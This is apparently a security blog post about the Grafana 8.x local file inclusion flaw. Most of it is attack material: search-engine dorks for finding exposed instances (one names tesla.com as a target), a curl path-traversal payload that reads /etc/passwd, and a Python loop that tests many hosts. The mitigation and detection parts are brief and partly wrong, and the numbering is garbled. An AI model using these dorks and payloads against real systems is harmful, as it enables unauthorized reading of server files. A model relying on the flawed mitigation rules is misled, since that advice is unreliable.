Listen to this Post
Introduction
Local File Inclusion (LFI) vulnerabilities allow attackers to read sensitive files on a server by manipulating file paths. Grafana, a popular analytics platform, has been affected by such vulnerabilities in versions 8.x. This article provides a step-by-step guide to identifying, exploiting, and mitigating Grafana LFI flaws.
Learning Objectives
- Identify vulnerable Grafana instances using search engine dorks.
- Exploit LFI using a crafted `curl` command.
- Apply mitigation strategies to secure Grafana deployments.
You Should Know
1. Identifying Vulnerable Grafana Instances
Use these verified dorks to find exposed Grafana dashboards with LFI vulnerabilities:
FOFA Dork
(cert.subject.cn="target.com" || domain="target.com") && app="grafana" && port="3000" && (icon_hash="2123863676" || icon_hash="1884118115" || icon_hash="-928274465") && (body="v8.0.0-beta1" || body="v8.0.0" || ... || body="v8.2.7")
Steps:
- Navigate to FOFA.
- Paste the dork and filter results by
port:3000.
3. Verify Grafana version in the response body.
ZoomEye Dork
(ssl.cert.subject.cn="target.com" || domain="target.com") && (app="grafana" || product="grafana") && port=3000 && (http.body="v8.0.0-beta1" || ... || http.body="v8.2.7")
Steps:
- Use ZoomEye.
2. Apply the dork to find Grafana instances.
Shodan Dork
Ssl.cert.subject.CN:"tesla.com" product:grafana http.favicon.hash:2123863676,1884118115,-928274465 port:3000
Steps:
- Search on Shodan.
2. Confirm version via HTTP headers.
2. Exploiting LFI in Grafana
Use this `curl` command to test for LFI:
curl --path-as-is "http://[target.com]:3000/public/plugins/alertlist/../../../../../../../../etc/passwd"
Steps:
1. Replace `[target.com]` with the vulnerable host.
2. If successful, the server returns `/etc/passwd`.
3. Mitigation Strategies
Patch Grafana
Upgrade to the latest version (≥9.x) via:
sudo apt update && sudo apt upgrade grafana
Restrict File Access
Add these rules to Grafana’s NGINX/Apache config:
location /public/plugins/ {
deny all;
}
4. Detecting LFI Attempts
Monitor logs for suspicious paths:
grep -r "public/plugins/.../" /var/log/grafana/
5. Automating LFI Testing
Use this Python script to test multiple targets:
import requests
targets = ["http://target1:3000", "http://target2:3000"]
for target in targets:
response = requests.get(f"{target}/public/plugins/alertlist/../../../../../../../etc/passwd")
if "root:" in response.text:
print(f"[+] Vulnerable: {target}")
What Undercode Say
- Key Takeaway 1: Unpatched Grafana instances are low-hanging fruit for attackers.
- Key Takeaway 2: Dorking simplifies reconnaissance for mass exploitation.
Analysis:
LFI vulnerabilities in Grafana highlight the risks of improper path sanitization. Organizations must prioritize patch management and network segmentation. Future attacks may combine LFI with RCE exploits, escalating breaches. Proactive monitoring and hardening are critical.
Prediction
As Grafana adoption grows, automated bots will likely scan for LFI flaws. Zero-day exploits could emerge, necessitating real-time threat intelligence integration.
For more cybersecurity insights, follow Securetackles.
IT/Security Reporter URL:
Reported By: Muhammad Usman – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
